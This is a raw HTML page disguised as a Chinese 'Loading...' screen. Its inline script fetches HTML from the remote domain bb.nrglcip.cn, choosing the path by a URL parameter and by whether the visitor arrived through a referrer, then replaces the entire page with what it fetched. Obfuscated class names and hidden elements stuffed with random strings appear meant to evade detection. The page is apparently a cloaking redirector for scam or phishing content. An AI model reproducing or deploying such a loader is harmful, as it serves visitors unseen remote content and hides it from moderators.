<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tNl6UdF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tNl6UdF .v8D04GKw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tNl6UdF .content {
            line-height: 50px;
            text-align: center
        }

        .tNl6UdF .img {
            width: 100%
        }

        .tNl6UdF .lUfb4dEsu {
            text-align: center
        }

        .tNl6UdF .lUfb4dEsu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tNl6UdF .lUfb4dEsu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tNl6UdF .lUfb4dEsu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tNl6UdF .lUfb4dEsu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tNl6UdF .lUfb4dEsu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tNl6UdF .lUfb4dEsu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tNl6UdF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function t3j7B0IUR5(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FXEEA2 = t3j7B0IUR5('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FXEEA2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FXEEA2 +".html?a=share";
		}
		
        bmfg6mQW=url+"#"+new Date().getTime();
        bmfg6mQW && function() {
            $.get(bmfg6mQW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>FCIHV2RmCsvaUTsubT2IK0FdFTgYyqj5YWWoJoG1krpuS68mgJwTdRh2dVo6</span>
<div style='display:none'>U8vNQ2u8ebv12dqCuzqURVz1I8felIbZ2NBQEW91KrGoID9ZFCCkxV0Ldih8ac2H3X</div>
<span style='display:none'>FCIHV2RmCsvaUTsubT2IK0FdFTgYyqj5YWWoJoG1krpuS68mgJwTdRh2dVo6</span>
<div style='display:none'>U8vNQ2u8ebv12dqCuzqURVz1I8felIbZ2NBQEW91KrGoID9ZFCCkxV0Ldih8ac2H3X</div>
<h1 style='display:none' >fxJvoVBDfjdYk2ULlj5vmQmVLLK01x0wKlVyDu0oKmul1XXC3yrTVOH2TyMUGKl3</h1>
<span style='display:none'>FCIHV2RmCsvaUTsubT2IK0FdFTgYyqj5YWWoJoG1krpuS68mgJwTdRh2dVo6</span>
<div style='display:none'>U8vNQ2u8ebv12dqCuzqURVz1I8felIbZ2NBQEW91KrGoID9ZFCCkxV0Ldih8ac2H3X</div><div class="tNl6UdF">
    <div class="v8D04GKw">
        <div class="lUfb4dEsu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>eTGhNeo5x8eewDGoq7PsdeETNiOJJfmRH05U6OSwxOQMdjNbSLKhzHgUsyD7jlkEnZ6bQGLQkergweNFBlRLHsYG7</div>
<li style='display:none' >YxcE83oIV73fQrsxflrDtCzMSNovMzHxW8xMQHUMKe3i7N2iJiE69gI</li>
<h1 style='display:none' >gM3oIX9QPP8fV5nOT8Z4QIQbCIJZ</h1></body>
</html>